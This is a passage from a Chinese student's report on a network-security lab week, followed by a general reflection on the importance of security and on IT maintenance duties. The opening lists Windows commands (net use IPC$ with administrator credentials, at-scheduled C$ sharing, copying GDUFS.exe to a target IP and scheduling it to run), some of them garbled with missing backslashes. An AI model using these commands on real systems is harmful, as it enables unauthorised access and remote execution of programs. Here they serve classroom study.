然后将“GDUFS.exe”复制到自己的C盘中,再根据一些命令把“GDUFS.exe”复制到目标主机的盘中,再进行运行。目标主机的IP:191.168.12.38 具体步骤及命令:
“开始”——“运行”——“cmd”
命令:net use 191.168.12.38ipc$ 123 /user:administrator 与目标主机之间建立联系
命令:net time 191.168.12.38 获取目标主机的时间
命令:at 191.168.12.38 08:21 net share c$=c: 与目标主机的C盘建立通道
命令:copy c:GDUFS.exe 191.168.12.38c$ 复制“GDUFS.exe”文件到目标主机的C盘中:
命令:191.168.12.38 10:49 c:GDUFS.exe 指定“GDUFS.exe”在目标主机中什么时候运行。
三、专周小结:
通过这次网络安全专周,我不仅仅是学到了很多知识,更是透彻的理解到了网络安全对生活已经将来工作的意义。
网络安全分为软件网络安全和硬件网络安全。一般我们说的网络安全就是软件上的网络安全,即局域网,互联网安全。
网络安全又分为内网安全和外网安全。在内外网安全中,内网安全则是重中之重。毕竟是家贼难防。据不完全统计,全国因为内网安全的问题,至少每年算是几亿美元。所以,网络安全特别重要。
至于在将来的工作中,我们也要严格尊市网络设备管理原则和使用秩序,对设备进行统一管理专人负责,严格要求自己对设备进行安全操作,保持强烈的责任感和服务意识,做好每一个细节,重点做好以下几项工作:
1,及时准确判断网络故障,做好上门维护工作或及时提醒网络合作商进行维护。
2,定期检查维护各网络设备的运行情况并进行维护。3,不定期对服务器进行更新和检查。
4,遇到特殊情况,及时向领导和老师汇报,努力提高应急处理问题和独立处理问题的能力。
感谢老师对我们的教导。
点击咨询 